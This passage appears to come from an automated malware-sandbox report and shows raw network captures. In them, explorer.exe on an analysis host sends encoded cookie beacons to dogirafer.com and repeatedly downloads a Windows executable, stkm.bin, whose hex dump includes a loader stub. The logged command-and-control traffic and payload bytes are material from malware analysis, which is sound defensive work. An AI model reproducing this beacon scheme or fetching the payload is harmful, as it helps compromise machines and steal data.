                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hndViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:44:59 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:44:59 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9o2S95TJS%2Fmbf8qF2gjKztFTET9n4LX0KaBTkQttjQj96HNifbMqLdQtRK4IFJTGt74b%2F2P%2F81fCi9alUU2Kw33C26Hm8ZPS8EF%2FdV5QI5XiG7vcmxPSdL7dVQUrmIKR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec506409fe8f797-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1525&rtt_var=920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1914754&cwnd=147&unsent_bytes=0&cid=383ffcb5995d3afc&ts=1560&x=0"
                                                                                                                                                                              2024-12-03 16:44:59 UTC54INData Raw: 33 30 0d 0a 4d 69 6d 66 52 38 47 31 32 6f 70 6e 61 78 2f 65 67 32 48 6a 67 33 52 4c 4d 6b 72 56 41 79 44 43 5a 2f 61 7a 74 79 66 4b 59 32 6d 63 70 67 3d 3d 0d 0a
                                                                                                                                                                              Data Ascii: 30MimfR8G12opnax/eg2Hjg3RLMkrVAyDCZ/aztyfKY2mcpg==
                                                                                                                                                                              2024-12-03 16:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.449869104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:01 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hkdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:03 UTC789INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59QqeCaJ7yzEFT%2BXqa2XjA9hTKrOnvpacX1Y%2Fwapvmc84%2FFkSycH1SMqhjf3dBjyT%2BAEydOCHxrOP9G%2FA9w%2BbP5mgh7JBvNNNmXqLQAdEbbnvYdKBuiU9NoVKLCbT4za"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50656ecf80f6c-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1525&rtt_var=595&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1048&delivery_rate=1914754&cwnd=180&unsent_bytes=0&cid=a2f9779c11cdbf65&ts=1653&x=0"
                                                                                                                                                                              2024-12-03 16:45:03 UTC427INData Raw: 31 61 34 0d 0a 4d 79 36 61 52 4d 71 77 33 34 70 76 5a 52 33 64 67 57 62 6c 67 33 42 48 50 55 2f 55 42 69 50 43 61 66 71 36 75 53 37 49 59 6d 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 55 51 74 66 70 54 6f 37 46 59 6d 43 4c 65 33 73 71 52 47 73 5a 53 74 70 38 6f 33 36 30 35 64 48 32 52 4d 36 73 47 69 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 73 78 41 65 2f 6d 49 52 56 2b 61 62 44 48 63 33 51 6c 37 73 74 46 37 6c 50 62 43 48 5a 43 67 45 34 35 4d 56 77 4a 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 50 66 64 54 51 4a
                                                                                                                                                                              Data Ascii: 1a4My6aRMqw34pvZR3dgWblg3BHPU/UBiPCafq6uS7IYmmcphSGpB6yiJiVjA1qIUQtfpTo7FYmCLe3sqRGsZStp8o3605dH2RM6sGifW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcsxAe/mIRV+abDHc3Ql7stF7lPbCHZCgE45MVwJcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZPfdTQJ
                                                                                                                                                                              2024-12-03 16:45:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.449878104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:05 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hldViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo=
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:45:07 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:06 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ziEZaMtAmwKqrW7G53Nopxw6w7y1nXvXgLlR%2Bu8MzmIzrEksiRExLUbjAXPpy05zI8IMh%2BMfmFZo2yQcV8fAagzNIPR4irzJcWPOwGMyucsfqy0rZfb01%2BhwM4SwD1WN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5066e5a0432e2-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1837&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1482986&cwnd=159&unsent_bytes=0&cid=109b0f9602647ae3&ts=1647&x=0"
                                                                                                                                                                              2024-12-03 16:45:07 UTC427INData Raw: 31 61 34 0d 0a 4d 79 6d 61 51 73 65 78 33 34 70 68 59 42 37 5a 67 57 58 6e 67 33 52 4c 4f 6b 7a 56 41 79 4c 43 5a 2f 2b 32 76 53 58 4b 59 32 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6f 4c 6b 63 75 66 70 66 6e 37 46 38 6b 43 62 57 33 74 61 4e 47 75 70 4b 71 6f 63 45 2b 37 55 35 53 48 47 52 50 37 4d 58 73 44 47 6c 31 64 48 45 73 51 51 6e 32 75 59 53 4a 44 43 48 52 71 33 63 4d 4e 4a 6b 63 34 72 38 34 78 55 4b 30 75 2f 43 62 58 32 73 68 6f 41 6d 6c 42 68 76 34 45 4d 73 30 41 75 33 6b 4a 48 4d 59 62 37 50 46 65 58 67 73 71 34 4a 4f 35 6c 72 66 44 6e 5a 44 69 30 6f 37 4e 56 77 42 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4e 76 39 62 51 35
                                                                                                                                                                              Data Ascii: 1a4MymaQsex34phYB7ZgWXng3RLOkzVAyLCZ/+2vSXKY2mcphSGpB6yiJiVjA1oLkcufpfn7F8kCbW3taNGupKqocE+7U5SHGRP7MXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EMs0Au3kJHMYb7PFeXgsq4JO5lrfDnZDi0o7NVwBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZNv9bQ5
                                                                                                                                                                              2024-12-03 16:45:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.449886104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:10 UTC126OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              2024-12-03 16:45:10 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:10 GMT
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Content-Length: 857600
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                              Age: 4266
                                                                                                                                                                              Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14L%2Fu8%2BlnCW0yRlADcPpELq%2B1wv9T7SMftgeEw0sB0I1BVJ5g74nE3sHXv0mlPQ5sRepvMQoLQs9YQvJsNILZuQzv%2Fb790jzzlHIf%2FP1PKio7OmxIvIBDM7CAH%2B7Q4%2Bu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5068b9afa43c9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1675&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1722713&cwnd=230&unsent_bytes=0&cid=a4d7cd64d871f008&ts=2193&x=0"
                                                                                                                                                                              2024-12-03 16:45:10 UTC424INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                                                              Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                                                                                              2024-12-03 16:45:10 UTC1369INData Raw: 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                                                                                                                              2024-12-03 16:45:10 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              2024-12-03 16:45:10 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:
                                                                                                                                                                              2024-12-03 16:45:10 UTC1369INData Raw: 09 ff c2 66 39 4c 54 20 75 f7 48 8d 4c 24 20 e8 cd 13 00 00 eb 02 33 c0 48 81 c4 38 02 00 00 c3 cc 48 89 5c 24 08 48 89 7c 24 10 55 48 8d ac 24 60 fd ff ff 48 81 ec a0 03 00 00 48 8d 0d 7b 4a 0c 00 c7 44 24 20 eb 2f 76 e0 48 8d 05 ac 46 0c 00 48 89 4c 24 28 48 89 44 24 30 48 8d 05 53 46 0c 00 48 89 44 24 48 48 8d 05 4f 46 0c 00 48 89 44 24 60 48 8d 05 4b 46 0c 00 48 89 44 24 78 48 8d 05 d7 46 0c 00 48 89 45 90 48 8d 05 3c 46 0c 00 48 89 45 a8 48 8d 05 39 46 0c 00 48 89 45 c0 48 8d 05 36 46 0c 00 48 89 45 d8 48 8d 05 33 46 0c 00 48 89 45 f0 48 8d 05 30 46 0c 00 48 89 45 08 48 8d 05 2d 46 0c 00 48 89 45 20 48 8d 05 32 46 0c 00 48 89 45 38 48 8d 05 2f 46 0c 00 48 89 45 50 48 8d 05 2c 46 0c 00 48 89 45 68 48 8d 05 29 46 0c 00 48 89 85 80 00 00 00 48 8d 05 23
                                                                                                                                                                              Data Ascii: f9LT uHL$ 3H8H\$H|$UH$`HH{JD$ /vHFHL$(HD$0HSFHD$HHOFHD$`HKFHD$xHFHEH<FHEH9FHEH6FHEH3FHEH0FHEH-FHE H2FHE8H/FHEPH,FHEhH)FHH#


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.449894104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:13 UTC150OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-12-03 16:45:13 UTC947INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:13 GMT
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Content-Length: 857600
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                              Age: 4269
                                                                                                                                                                              Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uj6oAaovnGPUQjumzivS8d94U%2F%2BtW99j%2ByCPv9vgcTlT3d7I84Lz1rEZ%2BG0fnl2zIiDBfsKWzucS%2FQ5o1fQKJ467y3Ef%2BASGEgWAsv6Eiv8I%2FkgiNncC%2BqqmNHY9vqMu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5069e4cf00f3f-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1538&min_rtt=1531&rtt_var=589&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=764&delivery_rate=1836477&cwnd=193&unsent_bytes=0&cid=53f68de8e113a7be&ts=1734&x=0"
                                                                                                                                                                              2024-12-03 16:45:13 UTC422INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                                                              Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
                                                                                                                                                                              2024-12-03 16:45:13 UTC1369INData Raw: 00 00 00 70 0c 00 20 5b 00 00 00 00 00 00 00 00 00 00 00 f0 0c 00 70 10 00 00 d0 b8 0b 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b9 0b 00 94 00 00 00 00 00 00 00 00 00 00 00 00 50 0a 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 30 0a 00 00 10 00 00 00 30 0a 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 62 73 73 00 00 00 00 00 00 10 00 00 00 40 0a 00 00 10 00 00 00 40 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 64 61 74 61 00 00 00 c0 01 00 00 50 0a 00 00 c0 01 00 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 60 00 00 00 10 0c 00 00 60 00 00 00 10 0c 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: p [p8Ph.text00 `bss@@.rdataPP@@.data``
                                                                                                                                                                              2024-12-03 16:45:13 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii:


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.449904104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:45:16 UTC126OUTGET /files/stkm.bin HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              2024-12-03 16:45:16 UTC947INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:45:16 GMT
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Content-Length: 857600
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Disposition: attachment; filename = stkm.bin
                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                              Age: 4272
                                                                                                                                                                              Last-Modified: Tue, 03 Dec 2024 15:34:04 GMT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7b0%2F5w2%2F74gWb8LXvT1o6rzuiM8tLFtuEOpWT%2BG06CtQuvpWygk1eY7WhO01p%2FSy3SXpX7YlV5lNQmiDVLbk77LzdfZHkkYniW9kr%2FkXvo%2B%2Fli2n1MYd63ehRMeXf%2BpO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec506b15b3a0c78-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1566&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=764&delivery_rate=1864623&cwnd=230&unsent_bytes=0&cid=97aa066eb3c50aca&ts=1800&x=0"
                                                                                                                                                                              2024-12-03 16:45:16 UTC422INData Raw: 4d 5a 45 52 e8 00 00 00 00 59 48 83 e9 09 48 8b c1 48 05 00 10 0d 00 ff d0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 96 98 3e 4d f7 f6 6d 4d f7 f6 6d 4d f7 f6 6d f9 6b 07 6d 4a f7 f6 6d f9 6b 05 6d d6 f7 f6 6d f9 6b 04 6d 42 f7 f6 6d e0 a9 f5 6c 4a f7 f6 6d e0 a9 f3 6c 51 f7 f6 6d e0 a9 f2 6c 5c f7 f6 6d 44 8f 75 6d 4c f7 f6 6d 44 8f 71 6d 4c f7 f6 6d 44 8f 65 6d 42 f7 f6 6d 4d f7 f7 6d ff f7 f6 6d f8 a9 fe 6c 5b f7 f6 6d f8 a9 09 6d 4c f7 f6 6d f8 a9 f4 6c 4c f7 f6 6d 52 69 63 68 4d f7 f6
                                                                                                                                                                              Data Ascii: MZERYHHH!L!This program cannot be run in DOS mode.$>MmMmMmkmJmkmmkmBmlJmlQml\mDumLmDqmLmDemBmMmml[mmLmlLmRichM
